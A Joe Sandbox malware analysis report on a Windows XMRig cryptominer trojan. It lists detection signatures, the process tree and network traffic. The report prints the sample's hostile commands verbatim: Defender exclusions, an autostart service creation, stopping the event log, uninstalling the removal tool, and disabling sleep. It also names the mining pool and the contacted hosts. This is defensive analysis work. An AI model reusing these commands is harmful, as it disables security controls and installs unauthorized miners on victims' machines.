Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gq83mrprwy.exe

Overview

General Information

Sample name:gq83mrprwy.exe
renamed because original name is a hash value
Original sample name:3b43da1be0c39802b78f6b2c55c4d7e6.exe
Analysis ID:1432188
MD5:3b43da1be0c39802b78f6b2c55c4d7e6
SHA1:c7735b309f6543439e447def8351d7238f7c9d58
SHA256:00f5cb420d8caf253b67e22714104ce1fb2d75341286c6e3ff31f527e7e5f5eb
Tags:64CoinMinerexetrojan
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • gq83mrprwy.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\gq83mrprwy.exe" MD5: 3B43DA1BE0C39802B78F6B2C55C4D7E6)
    • powershell.exe (PID: 7392 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8240 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 8488 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 8256 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8264 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8272 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8288 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8304 cmdline: C:\Windows\system32\sc.exe delete "CENLNOGJ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8504 cmdline: C:\Windows\system32\sc.exe create "CENLNOGJ" binpath= "C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8588 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8596 cmdline: C:\Windows\system32\sc.exe start "CENLNOGJ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • chrome.exe (PID: 7628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7880 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=1932,i,323240388522049765,3171702959307320635,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 7744 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • vefyedjsvjut.exe (PID: 8668 cmdline: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe MD5: 3B43DA1BE0C39802B78F6B2C55C4D7E6)
    • powershell.exe (PID: 8680 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 9104 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7488 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 9112 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 9152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 9120 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 9168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 9136 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 9184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 9144 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 9192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 9160 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 4488 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000002C.00000002.4196308144.00000000014DA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000002C.00000003.3173090923.00000000014A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        0000002C.00000003.3172825597.00000000122A6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000002C.00000003.2566481602.00000000014E9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            0000002C.00000003.2002158674.0000000000C43000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 7 entries

              Change of critical system settings

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\gq83mrprwy.exe", ParentImage: C:\Users\user\Desktop\gq83mrprwy.exe, ParentProcessId: 7380, ParentProcessName: gq83mrprwy.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 8256, ProcessName: powercfg.exe

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gq83mrprwy.exe", ParentImage: C:\Users\user\Desktop\gq83mrprwy.exe, ParentProcessId: 7380, ParentProcessName: gq83mrprwy.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7392, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gq83mrprwy.exe", ParentImage: C:\Users\user\Desktop\gq83mrprwy.exe, ParentProcessId: 7380, ParentProcessName: gq83mrprwy.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7392, ProcessName: powershell.exe
              Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "CENLNOGJ" binpath= "C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "CENLNOGJ" binpath= "C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\gq83mrprwy.exe", ParentImage: C:\Users\user\Desktop\gq83mrprwy.exe, ParentProcessId: 7380, ParentProcessName: gq83mrprwy.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "CENLNOGJ" binpath= "C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe" start= "auto", ProcessId: 8504, ProcessName: sc.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gq83mrprwy.exe", ParentImage: C:\Users\user\Desktop\gq83mrprwy.exe, ParentProcessId: 7380, ParentProcessName: gq83mrprwy.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7392, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7744, ProcessName: svchost.exe

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\gq83mrprwy.exe", ParentImage: C:\Users\user\Desktop\gq83mrprwy.exe, ParentProcessId: 7380, ParentProcessName: gq83mrprwy.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 8588, ProcessName: sc.exe
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeReversingLabs: Detection: 63%
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeVirustotal: Detection: 58%Perma Link
              Source: gq83mrprwy.exeReversingLabs: Detection: 63%
              Source: gq83mrprwy.exeVirustotal: Detection: 55%Perma Link

              Bitcoin Miner

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 0000002C.00000002.4196308144.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000003.3173090923.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000003.3172825597.00000000122A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000003.2566481602.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000003.2002158674.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000003.2566319843.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4488, type: MEMORYSTR
              Source: unknownDNS query: name: xmr-eu1.nanopool.org
              Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: gq83mrprwy.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: vefyedjsvjut.exe, 0000001C.00000003.1948571755.00000204887F0000.00000004.00000001.00020000.00000000.sdmp

              Networking

              barindex
              Source: C:\Windows\explorer.exeNetwork Connect: 51.15.65.182 10343Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 145.14.144.16 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 145.14.144.253 443Jump to behavior
              Source: global trafficTCP traffic: 192.168.2.4:49752 -> 51.15.65.182:10343
              Source: Joe Sandbox ViewIP Address: 51.15.65.182 51.15.65.182
              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
              Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
              Source: Joe Sandbox ViewASN Name: AWEXUS AWEXUS
              Source: Joe Sandbox ViewASN Name: AWEXUS AWEXUS
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGKv9rrEGIjD60VmSgpC6cOPMVPM6iFgI5KUXbg-hj5Slfx8AmR1Y-wEuAbZfNmjYd7xW-s1FHlsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-14; NID=513=LZiA5-OikT2FARfJHTlz7GmAJ_1c58E7iPXPG6eGJ089a77Y0-A6KUT0uJExUp812F0MCRYzKz_xF1rCjduqg4NLus6wsGOVnnSv99SY6w8HBLrl6kYAnOlOD2IyKmr4tWFD8dUTUmc2UGqjfkQzh17sbjitF35JGlyVZqViFFg
              Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGKv9rrEGIjCUP8rJI6uQpcCA_sA23NWIvsltkwq3MeDorQiPFEiOdS9-9s9TL79P98P43HdQwyEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-14; NID=513=LZiA5-OikT2FARfJHTlz7GmAJ_1c58E7iPXPG6eGJ089a77Y0-A6KUT0uJExUp812F0MCRYzKz_xF1rCjduqg4NLus6wsGOVnnSv99SY6w8HBLrl6kYAnOlOD2IyKmr4tWFD8dUTUmc2UGqjfkQzh17sbjitF35JGlyVZqViFFg
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FO+9xhx+5xDkVGm&MD=3ZbB+Dxa HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FO+9xhx+5xDkVGm&MD=3ZbB+Dxa HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
              Source: global trafficDNS traffic detected: DNS query: pachydermal-deviati.000webhostapp.com
